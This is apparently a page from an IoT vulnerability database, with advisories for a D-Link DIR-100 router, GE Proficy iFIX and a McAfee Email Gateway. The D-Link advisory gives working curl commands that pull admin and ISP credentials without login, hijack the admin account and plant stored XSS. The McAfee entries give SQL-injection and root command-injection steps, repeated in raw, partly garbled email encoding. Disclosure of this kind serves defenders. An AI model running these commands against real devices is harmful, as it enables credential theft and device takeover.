VARIoT IoT vulnerabilities database
| VAR-202002-0669 | CVE-2013-7054 | D-Link DIR-100 Vulnerable to cross-site scripting |
CVSS V2: 4.3 CVSS V3: 6.1 Severity: MEDIUM |
D-Link DIR-100 Contains a cross-site scripting vulnerability.The information may be obtained and the information may be altered. D-Link DIR-100 Ethernet Broadband Router is a broadband router device. D-Link DIR-100 Ethernet Broadband Router fails to properly filter the input of static IP address tags or scheduling tags, allowing remote attackers to exploit vulnerabilities to build malicious URIs, entice users to resolve, obtain sensitive cookies, hijack sessions or on the client side. Malicious operation on. D-Link DIR-100 is prone to the following security vulnerabilities:
1. An authentication-bypass vulnerability
2. Multiple information-disclosure vulnerabilities
3. A cross-site request-forgery vulnerability
4. A cross-site scripting vulnerability
An attacker can exploit these issues to execute HTML and arbitrary script code in the browser of an unsuspecting user in the context of the affected device, steal cookie-based authentication credentials, bypass-authentication mechanism, gain access to potentially sensitive information. Other attacks are also possible. * Title: Router D-Link DIR-100 Multiple Vulnerabilities
* Date: 2013-12-18
* Author: Felix Richter
* Contact: root@euer.krebsco.de
* Vulnerable Software: ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b07_ALL_de_20120410.zip
* Patched Software: ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b13_ALL_de_20131011.zip
* Report Version: 2.0
* Report URL: http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt
* Vulnerable: D-Link DIR-100
* Hardware Revision: D1
* Software Version: 4.03B07 (from 2012-04-10)
* CVE Numbers:
* CWE-287 Authentication Issues: CVE-2013-7051
* CWE-255 Issues with Credential Management: CVE-2013-7052
* CWE-352 Cross-Site Request Forgery: CVE-2013-7053
* CWE-79 Cross-Site Scripting: CVE-2013-7054
* CWE-200 Information Disclosure: CVE-2013-7055
* Google Dork: "D-Link Systems" inurl:bsc_internet.htm D1
* State: Patched by Vendor
* Link to Vendor Report: http://more.dlink.de/sicherheit/news.html#news8
# Table of Contents
1. Background
2. Technical Description
4. Severity and Remediation
5. Timeline
# 1. Background
The DIR-100 is designed for easy and robust connectivity among heterogeneous
standards-based network devices. Computers can communicate directly with this
router for automatic opening and closing of UDP/TCP ports to take full
advantage of the security provided without sacrificing functionality of on-line
applications.
# 2 Vulnerability Description
Multiple vulnerabilities have been found in the D-Link DIR-100 Ethernet
Broadband Router Revision D (and potentially other devices sharing the
affected firmware) that could allow a remote attacker:
- Retrieve the Administrator password without authentication leading to
authentication bypass [CWE-255]
- Retrieve sensitive configuration paramters like the pppoe username and
password without authentication [CWE-200]
- Execute privileged Commands without authentication through a race
condition leading to weak authentication enforcement [CWE-287]
- Sending formatted request to a victim which then will execute arbitrary
commands on the device (CSRF) [CWE-352]
- Store arbitrary javascript code which will be executed when a victim
accesses the administrator interface [CWE-79]
CVE-Numbers for these vulnerabilities has not yet been assigned.
# 3 Technical Description of the Vulnerabilities
## 3.0 The DIR-100 Web Interface and CGI
The DIR-100 Web interface provides a cgi-script on `/cliget.cgi` for
unauthenticated users and `/cli.cgi` for authenticated requests.
list of features provided by each cgi-script can be retrieved by:
curl 'http://192.168.1.104/cliget.cgi?cmd=help'
# and respectively when authenticated
curl 'http://192.168.1.104/cli.cgi?cmd=help'
## 3.1 Authentication Bypass
### Description
The administrator password is not protected in any way on the device, every
attacker with access to the administrator interface which listens on port 80.
For retrieving the Administrator password the request must not be
authenticated.
### Proof of Concept
The web interface provides two distinct ways to retrieve the adminstrator
password:
curl 'http://192.168.0.1/cliget.cgi?cmd=$sys_user1'
curl 'http://192.168.0.1/cliget.cgi?cmd=easysetup%20summary'
## 3.2 Weak Authentication
### Description
As soon as a user is logged into the administration interface, the cli CGI
is `unlocked` and can be used by without authenticating before as
the cgi-script does not check any other authentication parameters such as
cookies or HTTP Parameters. The only access check is if the IP-Address is
the same.
### Proof of Concept
# open the router interface in a web browser and log in
firefox 'http://192.168.0.1/'
# open a new terminal or another web-browser which is currently not logged
# in and try to access
curl 'http://192.168.0.1/cli.cgi?cmd=help'
# this request will be authenticated and it will not be redirected to the
# login page. If no user is logged in, the request will be redirected to
# the login
## 3.3 Retrieve sensitive information
### Description
Besides retrieving the administrator password without authentication it is
possible to retrieve other sensitive configuration from the device as well like
the PPTP and poe Username and Password, as well as the configured dyndns
username and password and configured mail log credentials when these parameters
are configured.
No authentication is requred.
### Proof of Concept
curl 'http://192.168.0.1/cliget.cgi?cmd=$ddns1'
curl 'http://192.168.0.1/cliget.cgi?cmd=$poe_user'
curl 'http://192.168.0.1/cliget.cgi?cmd=$poe_pass'
curl 'http://192.168.0.1/cliget.cgi?cmd=$pptp_user'
curl 'http://192.168.0.1/cliget.cgi?cmd=$pptp_pass'
curl 'http://192.168.0.1/cliget.cgi?cmd=$log_mail_user'
curl 'http://192.168.0.1/cliget.cgi?cmd=$log_mail_pwd'
## 3.4 Cross-Site Request Forgery (CSRF)
### Description
CSRF attacks can be launched by sending a formatted request to a victim, then
tricking the victim into loading the request (often automatically), which
makes it appear that the request came from the victim. As an example the
attacker could change the administrator password (see Proof of Concept code)
and enable system remote access.
### Proof of Concept
Changing the password for administrator can be done when the ip-address is
authenticated:
# Log into DIR-100
curl -X POST -d 'uname=admin&pws=password&login=Login' 'http://192.168.0.1/login.htm'
# Change password
curl 'http://192.168.0.1/cli.cgi?cmd=$sys_user1=user=admin&pass=c%;$sys_passHash=4%25;commit'
# enable remote console
curl 'http://192.168.0.1/cli.cgi?cmd=$sys_remote_enable=1%25;$sys_remote_ip=0.0.0.0%25;$sys_remote_port=80%25;commit'
## 3.5 Cross-Site Scripting (XSS)
### Description
It is possible for an authenticated user to store information on the server
which will not be checked on the server side for special characters which
results in persistent Cross-Site Scripting Vulnerabilities. With this
vulnerabilty the victim (administrator) will run javascript code in the
context of the D-Link DIR-100.
XSS is possible because only on the client side (javascript code) the input is
filtered and validated, sending data directly to the CGI scripts.
### Proof of Concept
# Log into DIR-100
curl -X POST -d 'uname=admin&pws=password&login=Login' 'http://192.168.0.1/login.htm'
# XSS in Static IP Address Tab
curl 'http://192.168.1.104/cli.cgi?cmd=dhcps%20set%20name=<script>alert(1)</script>%26ip=192.168.0.199%26mac=00:11:22:33:44:55%26flg=1%26exp='
# XSS in Scheduler tab
curl 'http://192.168.1.104/cli.cgi?cmd=$sched2=schen=1%26time=0-60%26day=5%26desc=<script>alert(1)</script>%26use=0%26idx=2%26;commit'
# 4 Severity and Remediation
This exploits are considered very critical, especially when the feature of remote
administration is activated on the system.
Weak authentication, together with cross-site request forgery and authentication
bypass can result in a full device compromise from an arbitrary website the victim is
accessing, even if the device has remote administration deactivated on the
internet-port. It is recommended to upgrade the router with the newest firmware
of the D-Link DIR-100.
# 5 Timeline
2013-09-13 - First Contact with D-Link Support
2013-09-19 - Sent Report
2013-10-14 - Request Status update, Response: Beta will be available mid October
2013-12-02 - Vendor publishes Firmware Update
2013-12-11 - Request CVE-IDs
2013-12-18 - Publish the report
| VAR-201312-0506 | No CVE | GE Proficy HMI/SCADA-iFIX 'TCPTASK.exe' Remote Buffer Overflow Vulnerability |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
GE Intelligent Platforms Proficy HMI/SCADA\342\200\223iFIX is the world's leading industrial automation software solution that provides process visualization, data acquisition and data monitoring for production operations. GE Proficy HMI/SCADA-iFIX 4.5, 5.0, 5.1 has a remote buffer overflow vulnerability in the implementation of the TCP/IP task process (TCPTASK.exe). Successful exploitation allows an attacker to execute arbitrary code in the context of the affected application
| VAR-201312-0504 | No CVE | GE Proficy HMI/SCADA-iFIX Unsafe Default Password Vulnerability |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
GE Intelligent Platforms Proficy HMI/SCADA\342\200\223iFIX is the world's leading industrial automation software solution that provides process visualization, data acquisition and data monitoring for production operations. GE Proficy HMI/SCADA-iFIX 7.19i and 7.44a have an unsafe default password vulnerability in their implementation. A remote attacker can exploit this vulnerability to gain unauthorized access to a device if they know the default certificate set during the installation process
| VAR-201312-0502 | No CVE | GE Proficy HMI/SCADA-iFIX 'TCPTASK.exe' Remote Denial of Service Vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
GE Intelligent Platforms Proficy HMI/SCADA\342\200\223iFIX is the world's leading industrial automation software solution that provides process visualization, data acquisition and data monitoring for production operations. GE Proficy HMI/SCADA-iFIX 5.0, 5.1, 5.5 has a remote buffer overflow vulnerability in the implementation of the TCP/IP task process (TCPTASK.exe). A remote attacker exploits this vulnerability by sending a specially crafted TCP/IP message, which can result in a denial of service after successful exploitation
| VAR-201312-0549 | No CVE | TP-Link TL-WR740N/TL-WR740ND Wireless N Router HTTP Processing Denial of Service Vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The TP-Link TL-WR740N/TL-WR740ND Wireless N router HTTP service failed to properly handle user-submitted requests, allowing remote attackers to exploit exploits to send specially crafted requests to crash the server, causing a denial of service attack. TP-LINK TL-WR740N and TL-WR740ND are wireless router products of China TP-LINK company.
A denial of service vulnerability exists in TP-LINK TL-WR740N / TL-WR740ND using 3.12.11 Build 120320 Rel.51047n firmware. An attacker could use this vulnerability to crash an affected device and cause a denial of service. TP-Link TL-WR740N/TL-WR740ND are prone to a denial-of-service vulnerability
| VAR-201312-0316 | CVE-2013-7103 | McAfee Email Gateway Vulnerable to arbitrary command execution |
CVSS V2: 9.0 CVSS V3: - Severity: HIGH |
McAfee Email Gateway 7.6 allows remote authenticated administrators to execute arbitrary commands via shell metacharacters in the value attribute in a (1) TestFile XML element or the (2) hostname. NOTE: this issue can be combined with CVE-2013-7092 to allow remote attackers to execute commands. McAfee Email and Web Security Appliance and Email Gateway are prone to multiple SQL-injection and remote command-execution vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Exploiting these issues could allow an attacker to execute arbitrary command, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. The solution offers incoming threat protection, outgoing encryption, data loss prevention, and more. --047d7bd6c5d012977c04eca87ee7
Content-Type: text/plain; charset=windows-1252
Content-Transfer-Encoding: quoted-printable
McAfee Email Gateway 7.6 multiple vulnerabilities
http <http://www.mcafee.com/us/products/email-gateway.aspx>://<http://www.m=
cafee.com/us/products/email-gateway.aspx>
www <http://www.mcafee.com/us/products/email-gateway.aspx>.<http://www.mcaf=
ee.com/us/products/email-gateway.aspx>
mcafee <http://www.mcafee.com/us/products/email-gateway.aspx>.<http://www.m=
cafee.com/us/products/email-gateway.aspx>
com <http://www.mcafee.com/us/products/email-gateway.aspx>/<http://www.mcaf=
ee.com/us/products/email-gateway.aspx>
us <http://www.mcafee.com/us/products/email-gateway.aspx>/<http://www.mcafe=
e.com/us/products/email-gateway.aspx>
products <http://www.mcafee.com/us/products/email-gateway.aspx>/<http://www=
.mcafee.com/us/products/email-gateway.aspx>
email <http://www.mcafee.com/us/products/email-gateway.aspx>-<http://www.mc=
afee.com/us/products/email-gateway.aspx>
gateway <http://www.mcafee.com/us/products/email-gateway.aspx>.<http://www.=
mcafee.com/us/products/email-gateway.aspx>
aspx <http://www.mcafee.com/us/products/email-gateway.aspx> -- Has free
trial
Many instances of SQL injection were found as an unprivileged read-only
authenticated user that allow the user to completely take over the accounts
of other users by using a stacked injection technique to run UPDATE
statements. Other techniques available are error-based, time-based, and
boolean-based injections.
Several remote command execution vulnerabilities were found as an
administrator which are run as the local root user. By utilising the SQL
injections as an unprivileged user, a user can escalate privileges by
updating the password hash of an admin, and ultimately run commands on the
server as root.
However, no data seems to be able to be exfiltrated via the command
injections. You may receive a connect back, but no commands can be run over
the connect-back. My solution to this was to pipe the results of commands
into a file in /tmp, then use the SQL injections to read the file from the
FS and return the results.
---------------------------------------------------
As a read-only user with reporting capabilities, many SQL injection vectors
exist when creating new reports based on filters. You can get to this part
of the web app by clicking the Reports menu item at the top-center. The
following request contains four exploitable SQL injections each exploitable
via a few different techniques:
POST /admin/cgi-bin/rpc/doReport/18 HTTP/1.1
Host: 172.31.16.87:10443
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:25.0) Gecko/20100101
Firefox/25.0
Accept: text/html,application/xhtml+xml,application/xml;q=3D0.9,*/*;q=3D0.8
Accept-Language: en-US,en;q=3D0.5
Accept-Encoding: gzip, deflate
Content-Type: text/plain; charset=3DUTF-8
Referer:
https://172.31.16.87:10443/admin/969bf547d36f6c7e4302952cf72a5ce3/en_US/htm=
l/index.html
Content-Length: 626
Cookie:
SCMUserSettings=3DlastUser%3Dusername%26popcheck%3D1%26lang%3Den_US%26last_=
page_id%3Ddashboard;
SHOW_BANNER_NOTICE=3DBannerShown%3D1;
ws_session=3DSID%3D616BF3CC-DA8B-401D-9220-ACED9A0FCD86
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
{"id":"loadreport","locale":"en_US","commands":[{"name":"getDDSData","args"=
:{"what":["events"],"filters":{"filter_period":"week","start_date":"Now","e=
vent_type":"ui_events","event_id":"all","reason":"all"},"date_range":"week"=
,"events_col":"edate","events_order":"DESC","events_offset":0,"events_nitem=
s":50,"tz":480,"start_date":1385491876.405,"is_mail":false,"itemized_nitems=
":10,"itemized_offset":0,"emailstatus_nitems":50,"emailstatus_offset":0,"em=
ailstatus_col":"edate","emailstatus_order":"DESC","dig_filters":[],"dig_cat=
egory":"","dig_summarize":true,"init":true,"type":"ui_events"}}],"filterTyp=
e":"system","autoconv":1}
Within the above request, the events_col, event_id, reason, events_order,
emailstatus_order, and emailstatus_col JSON keys are vulnerable to SQL
injection. You can capture the request with burpsuite and alter each value
by adding an apostrophe to view the SQL error in the response. You can also
use SQLmap to try various techniques for exploitability.
------------------------------------------------------
Many remote command execution vulnerabilities exist for administrator
users. Every vector I found was being run as the root user and they all
exists within a single request. As an administrator, go to the System tab
in the top menu. You will be presented with general server settings. Remove
the last letter of the hostname, and replace it back. You will now have a
green checkmark in the top right of the web application. Click this, then
click OK on the dialog that pops up in the web app. The next captured
request will be the request susceptible to command execution. It is a very
large request with XML contained in JSON. Because this makes sense.
Within this XML, you may search for any XML element whose =93name=94 attrib=
ute
contains TestFile. Any of these elements are susceptible to command
injection within the =93value=94 attribute. These filenames seems to be pas=
sed
to a utility like =91test=92 to ensure whether or not it exists. By using s=
hell
metacharacters, you can execute arbitrary commands on the system as root.
The hostname within this request is also susceptible to command injection
via shell metacharacters.
You may also search for any XML element called Command. Each of these
elements contains a small command to be run on a given event. You may alter
any of these to be run as root.
You may also search for an XML element called Script. This is used to
manage the cron jobs (make sure the corresponding Enabled element is set to
=931=94 instead of =930=94). You may alter or create any cron jobs that wil=
l be run
as root.
--=20
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
--047d7bd6c5d012977c04eca87ee7
Content-Type: text/html; charset=windows-1252
Content-Transfer-Encoding: quoted-printable
<div dir=3D"ltr"><p class=3D"">McAfee Email Gateway 7.6 multiple vulnerabil=
ities</p>
<p class=3D""><a href=3D"http://www.mcafee.com/us/products/email-gateway.as=
px">http</a><a href=3D"http://www.mcafee.com/us/products/email-gateway.aspx=
">://</a><a href=3D"http://www.mcafee.com/us/products/email-gateway.aspx">w=
ww</a><a href=3D"http://www.mcafee.com/us/products/email-gateway.aspx">.</a=
><a href=3D"http://www.mcafee.com/us/products/email-gateway.aspx">mcafee</a=
><a href=3D"http://www.mcafee.com/us/products/email-gateway.aspx">.</a><a h=
ref=3D"http://www.mcafee.com/us/products/email-gateway.aspx">com</a><a href=
=3D"http://www.mcafee.com/us/products/email-gateway.aspx">/</a><a href=3D"h=
ttp://www.mcafee.com/us/products/email-gateway.aspx">us</a><a href=3D"http:=
//www.mcafee.com/us/products/email-gateway.aspx">/</a><a href=3D"http://www=
.mcafee.com/us/products/email-gateway.aspx">products</a><a href=3D"http://w=
ww.mcafee.com/us/products/email-gateway.aspx">/</a><a href=3D"http://www.mc=
afee.com/us/products/email-gateway.aspx">email</a><a href=3D"http://www.mca=
fee.com/us/products/email-gateway.aspx">-</a><a href=3D"http://www.mcafee.c=
om/us/products/email-gateway.aspx">gateway</a><a href=3D"http://www.mcafee.=
com/us/products/email-gateway.aspx">.</a><a href=3D"http://www.mcafee.com/u=
s/products/email-gateway.aspx">aspx</a> -- Has free trial</p>
<p class=3D"">=A0</p>
<p class=3D"">Many instances of SQL injection were found as an unprivileged
read-only authenticated user that allow the user to completely take over th=
e accounts of
other users by using a stacked injection technique to run UPDATE statements=
.
Other techniques available are error-based, time-based, and boolean-based
injections.</p>
<p class=3D"">=A0</p>
<p class=3D"">Several remote command execution vulnerabilities were found
as an administrator which are run as the local root user. By utilising the =
SQL
injections as an unprivileged user, a user can escalate privileges by updat=
ing
the password hash of an admin, and ultimately run commands on the server as
root.</p>
<p class=3D"">=A0</p>
<p class=3D"">However, no data seems to be able to be exfiltrated via the
command injections. You may receive a connect back, but no commands can be =
run
over the connect-back. My solution to this was to pipe the results of comma=
nds
into a file in /tmp, then use the SQL injections to read the file from the =
FS
and return the results.</p>
<p class=3D"">=A0</p>
<p class=3D"">---------------------------------------------------</p>
<p class=3D"">=A0</p>
<p class=3D"">As a read-only user with reporting capabilities, many SQL
injection vectors exist when creating new reports based on filters. You can=
get
to this part of the web app by clicking the Reports menu item at the top-ce=
nter.
The following request contains four exploitable SQL injections each exploit=
able
via a few different techniques:</p>
<p class=3D"">=A0</p>
<p class=3D"">POST /admin/cgi-bin/rpc/doReport/18 HTTP/1.1</p>
<p class=3D"">Host: <a href=3D"http://172.31.16.87:10443">172.31.16.87:1044=
3</a></p>
<p class=3D"">User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:25.0)
Gecko/20100101 Firefox/25.0</p>
<p class=3D"">Accept:
text/html,application/xhtml+xml,application/xml;q=3D0.9,*/*;q=3D0.8</p>
<p class=3D"">Accept-Language: en-US,en;q=3D0.5</p>
<p class=3D"">Accept-Encoding: gzip, deflate</p>
<p class=3D"">Content-Type: text/plain; charset=3DUTF-8</p>
<p class=3D"">Referer: <a href=3D"https://172.31.16.87:10443/admin/969bf547=
d36f6c7e4302952cf72a5ce3/en_US/html/index.html">https://172.31.16.87:10443/=
admin/969bf547d36f6c7e4302952cf72a5ce3/en_US/html/index.html</a></p>
<p class=3D"">Content-Length: 626</p>
<p class=3D"">Cookie:
SCMUserSettings=3DlastUser%3Dusername%26popcheck%3D1%26lang%3Den_US%26last_=
page_id%3Ddashboard;
SHOW_BANNER_NOTICE=3DBannerShown%3D1;
ws_session=3DSID%3D616BF3CC-DA8B-401D-9220-ACED9A0FCD86</p>
<p class=3D"">Connection: keep-alive</p>
<p class=3D"">Pragma: no-cache</p>
<p class=3D"">Cache-Control: no-cache</p>
<p class=3D"">=A0</p>
<p class=3D"">{"id":"loadreport","locale":&qu=
ot;en_US","commands":[{"name":"getDDSData&quo=
t;,"args":{"what":["events"],"filters&qu=
ot;:{"filter_period":"week","start_date":&quo=
t;Now","event_type":"ui_events","event_id&quo=
t;:"all","reason":"all"},"date_range&quo=
t;:"week","events_col":"edate","events_o=
rder":"DESC","events_offset":0,"events_nitems=
":50,"tz":480,"start_date":1385491876.405,"is=
_mail":false,"itemized_nitems":10,"itemized_offset"=
;:0,"emailstatus_nitems":50,"emailstatus_offset":0,&quo=
t;emailstatus_col":"edate","emailstatus_order":&qu=
ot;DESC","dig_filters":[],"dig_category":"&qu=
ot;,"dig_summarize":true,"init":true,"type":&=
quot;ui_events"}}],"filterType":"system","aut=
oconv":1}</p>
<p class=3D"">=A0</p>
<p class=3D"">Within the above request, the events_col, event_id, reason,
events_order, emailstatus_order, and emailstatus_col JSON keys are vulnerab=
le
to SQL injection. You can capture the request with burpsuite and alter each
value by adding an apostrophe to view the SQL error in the response. You ca=
n
also use SQLmap to try various techniques for exploitability.</p>
<p class=3D"">=A0</p>
<p class=3D"">------------------------------------------------------</p>
<p class=3D"">=A0</p>
<p class=3D"">Many remote command execution vulnerabilities exist for
administrator users. Every vector I found was being run as the root user an=
d
they all exists within a single request. As an administrator, go to the Sys=
tem
tab in the top menu. You will be presented with general server settings. Re=
move
the last letter of the hostname, and replace it back. You will now have a g=
reen
checkmark in the top right of the web application. Click this, then click O=
K on
the dialog that pops up in the web app. The next captured request will be t=
he
request susceptible to command execution. It is a very large request with X=
ML
contained in JSON. Because this makes sense.</p>
<p class=3D"">=A0</p>
<p class=3D"">Within this XML, you may search for any XML element whose
=93name=94 attribute contains TestFile. Any of these elements are susceptib=
le to
command injection within the =93value=94 attribute. These filenames seems t=
o be
passed to a utility like =91test=92 to ensure whether or not it exists. Each
of these elements contains a small command to be run on a given event. You =
may
alter any of these to be run as root.</p>
<p class=3D"">=A0</p>
<p class=3D"">You may also search for an XML element called Script. This is
used to manage the cron jobs (make sure the corresponding Enabled element i=
s
set to =931=94 instead of =930=94). You may alter or create any cron jobs t=
hat will be
run as root.</p><div><br></div>-- <br><a href=3D"http://volatile-minds.blog=
spot.com">http://volatile-minds.blogspot.com</a> -- blog<br><a href=3D"http=
://www.volatileminds.net">http://www.volatileminds.net</a> -- website
</div>
--047d7bd6c5d012977c04eca87ee7--
| VAR-201312-0317 | CVE-2013-7104 | McAfee Email Gateway Vulnerabilities in arbitrary command execution |
CVSS V2: 9.0 CVSS V3: - Severity: HIGH |
McAfee Email Gateway 7.6 allows remote authenticated administrators to execute arbitrary commands by specifying them in the value attribute in a (1) Command or (2) Script XML element. NOTE: this issue can be combined with CVE-2013-7092 to allow remote attackers to execute commands. McAfee Email Gateway Contains a command execution vulnerability. McAfee Email and Web Security Appliance and Email Gateway are prone to multiple SQL-injection and remote command-execution vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Exploiting these issues could allow an attacker to execute arbitrary command, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. The solution offers incoming threat protection, outgoing encryption, data loss prevention, and more. --047d7bd6c5d012977c04eca87ee7
Content-Type: text/plain; charset=windows-1252
Content-Transfer-Encoding: quoted-printable
McAfee Email Gateway 7.6 multiple vulnerabilities
http <http://www.mcafee.com/us/products/email-gateway.aspx>://<http://www.m=
cafee.com/us/products/email-gateway.aspx>
www <http://www.mcafee.com/us/products/email-gateway.aspx>.<http://www.mcaf=
ee.com/us/products/email-gateway.aspx>
mcafee <http://www.mcafee.com/us/products/email-gateway.aspx>.<http://www.m=
cafee.com/us/products/email-gateway.aspx>
com <http://www.mcafee.com/us/products/email-gateway.aspx>/<http://www.mcaf=
ee.com/us/products/email-gateway.aspx>
us <http://www.mcafee.com/us/products/email-gateway.aspx>/<http://www.mcafe=
e.com/us/products/email-gateway.aspx>
products <http://www.mcafee.com/us/products/email-gateway.aspx>/<http://www=
.mcafee.com/us/products/email-gateway.aspx>
email <http://www.mcafee.com/us/products/email-gateway.aspx>-<http://www.mc=
afee.com/us/products/email-gateway.aspx>
gateway <http://www.mcafee.com/us/products/email-gateway.aspx>.<http://www.=
mcafee.com/us/products/email-gateway.aspx>
aspx <http://www.mcafee.com/us/products/email-gateway.aspx> -- Has free
trial
Many instances of SQL injection were found as an unprivileged read-only
authenticated user that allow the user to completely take over the accounts
of other users by using a stacked injection technique to run UPDATE
statements. Other techniques available are error-based, time-based, and
boolean-based injections.
Several remote command execution vulnerabilities were found as an
administrator which are run as the local root user. By utilising the SQL
injections as an unprivileged user, a user can escalate privileges by
updating the password hash of an admin, and ultimately run commands on the
server as root.
However, no data seems to be able to be exfiltrated via the command
injections. You may receive a connect back, but no commands can be run over
the connect-back. My solution to this was to pipe the results of commands
into a file in /tmp, then use the SQL injections to read the file from the
FS and return the results.
---------------------------------------------------
As a read-only user with reporting capabilities, many SQL injection vectors
exist when creating new reports based on filters. You can get to this part
of the web app by clicking the Reports menu item at the top-center. The
following request contains four exploitable SQL injections each exploitable
via a few different techniques:
POST /admin/cgi-bin/rpc/doReport/18 HTTP/1.1
Host: 172.31.16.87:10443
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:25.0) Gecko/20100101
Firefox/25.0
Accept: text/html,application/xhtml+xml,application/xml;q=3D0.9,*/*;q=3D0.8
Accept-Language: en-US,en;q=3D0.5
Accept-Encoding: gzip, deflate
Content-Type: text/plain; charset=3DUTF-8
Referer:
https://172.31.16.87:10443/admin/969bf547d36f6c7e4302952cf72a5ce3/en_US/htm=
l/index.html
Content-Length: 626
Cookie:
SCMUserSettings=3DlastUser%3Dusername%26popcheck%3D1%26lang%3Den_US%26last_=
page_id%3Ddashboard;
SHOW_BANNER_NOTICE=3DBannerShown%3D1;
ws_session=3DSID%3D616BF3CC-DA8B-401D-9220-ACED9A0FCD86
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
{"id":"loadreport","locale":"en_US","commands":[{"name":"getDDSData","args"=
:{"what":["events"],"filters":{"filter_period":"week","start_date":"Now","e=
vent_type":"ui_events","event_id":"all","reason":"all"},"date_range":"week"=
,"events_col":"edate","events_order":"DESC","events_offset":0,"events_nitem=
s":50,"tz":480,"start_date":1385491876.405,"is_mail":false,"itemized_nitems=
":10,"itemized_offset":0,"emailstatus_nitems":50,"emailstatus_offset":0,"em=
ailstatus_col":"edate","emailstatus_order":"DESC","dig_filters":[],"dig_cat=
egory":"","dig_summarize":true,"init":true,"type":"ui_events"}}],"filterTyp=
e":"system","autoconv":1}
Within the above request, the events_col, event_id, reason, events_order,
emailstatus_order, and emailstatus_col JSON keys are vulnerable to SQL
injection. You can capture the request with burpsuite and alter each value
by adding an apostrophe to view the SQL error in the response. You can also
use SQLmap to try various techniques for exploitability. Every vector I found was being run as the root user and they all
exists within a single request. As an administrator, go to the System tab
in the top menu. You will be presented with general server settings. Remove
the last letter of the hostname, and replace it back. You will now have a
green checkmark in the top right of the web application. Click this, then
click OK on the dialog that pops up in the web app. The next captured
request will be the request susceptible to command execution. It is a very
large request with XML contained in JSON. Because this makes sense.
Within this XML, you may search for any XML element whose =93name=94 attrib=
ute
contains TestFile. Any of these elements are susceptible to command
injection within the =93value=94 attribute. These filenames seems to be pas=
sed
to a utility like =91test=92 to ensure whether or not it exists. By using s=
hell
metacharacters, you can execute arbitrary commands on the system as root.
The hostname within this request is also susceptible to command injection
via shell metacharacters.
You may also search for any XML element called Command. Each of these
elements contains a small command to be run on a given event. You may alter
any of these to be run as root.
You may also search for an XML element called Script. This is used to
manage the cron jobs (make sure the corresponding Enabled element is set to
=931=94 instead of =930=94). You may alter or create any cron jobs that wil=
l be run
as root.
--=20
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
--047d7bd6c5d012977c04eca87ee7
Content-Type: text/html; charset=windows-1252
Content-Transfer-Encoding: quoted-printable
<div dir=3D"ltr"><p class=3D"">McAfee Email Gateway 7.6 multiple vulnerabil=
ities</p>
<p class=3D""><a href=3D"http://www.mcafee.com/us/products/email-gateway.as=
px">http</a><a href=3D"http://www.mcafee.com/us/products/email-gateway.aspx=
">://</a><a href=3D"http://www.mcafee.com/us/products/email-gateway.aspx">w=
ww</a><a href=3D"http://www.mcafee.com/us/products/email-gateway.aspx">.</a=
><a href=3D"http://www.mcafee.com/us/products/email-gateway.aspx">mcafee</a=
><a href=3D"http://www.mcafee.com/us/products/email-gateway.aspx">.</a><a h=
ref=3D"http://www.mcafee.com/us/products/email-gateway.aspx">com</a><a href=
=3D"http://www.mcafee.com/us/products/email-gateway.aspx">/</a><a href=3D"h=
ttp://www.mcafee.com/us/products/email-gateway.aspx">us</a><a href=3D"http:=
//www.mcafee.com/us/products/email-gateway.aspx">/</a><a href=3D"http://www=
.mcafee.com/us/products/email-gateway.aspx">products</a><a href=3D"http://w=
ww.mcafee.com/us/products/email-gateway.aspx">/</a><a href=3D"http://www.mc=
afee.com/us/products/email-gateway.aspx">email</a><a href=3D"http://www.mca=
fee.com/us/products/email-gateway.aspx">-</a><a href=3D"http://www.mcafee.c=
om/us/products/email-gateway.aspx">gateway</a><a href=3D"http://www.mcafee.=
com/us/products/email-gateway.aspx">.</a><a href=3D"http://www.mcafee.com/u=
s/products/email-gateway.aspx">aspx</a> -- Has free trial</p>
<p class=3D"">=A0</p>
<p class=3D"">Many instances of SQL injection were found as an unprivileged
read-only authenticated user that allow the user to completely take over th=
e accounts of
other users by using a stacked injection technique to run UPDATE statements=
.
Other techniques available are error-based, time-based, and boolean-based
injections.</p>
<p class=3D"">=A0</p>
<p class=3D"">Several remote command execution vulnerabilities were found
as an administrator which are run as the local root user. By utilising the =
SQL
injections as an unprivileged user, a user can escalate privileges by updat=
ing
the password hash of an admin, and ultimately run commands on the server as
root.</p>
<p class=3D"">=A0</p>
<p class=3D"">However, no data seems to be able to be exfiltrated via the
command injections. You may receive a connect back, but no commands can be =
run
over the connect-back. My solution to this was to pipe the results of comma=
nds
into a file in /tmp, then use the SQL injections to read the file from the =
FS
and return the results.</p>
<p class=3D"">=A0</p>
<p class=3D"">---------------------------------------------------</p>
<p class=3D"">=A0</p>
<p class=3D"">As a read-only user with reporting capabilities, many SQL
injection vectors exist when creating new reports based on filters. You can=
get
to this part of the web app by clicking the Reports menu item at the top-ce=
nter.
The following request contains four exploitable SQL injections each exploit=
able
via a few different techniques:</p>
<p class=3D"">=A0</p>
<p class=3D"">POST /admin/cgi-bin/rpc/doReport/18 HTTP/1.1</p>
<p class=3D"">Host: <a href=3D"http://172.31.16.87:10443">172.31.16.87:1044=
3</a></p>
<p class=3D"">User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:25.0)
Gecko/20100101 Firefox/25.0</p>
<p class=3D"">Accept:
text/html,application/xhtml+xml,application/xml;q=3D0.9,*/*;q=3D0.8</p>
<p class=3D"">Accept-Language: en-US,en;q=3D0.5</p>
<p class=3D"">Accept-Encoding: gzip, deflate</p>
<p class=3D"">Content-Type: text/plain; charset=3DUTF-8</p>
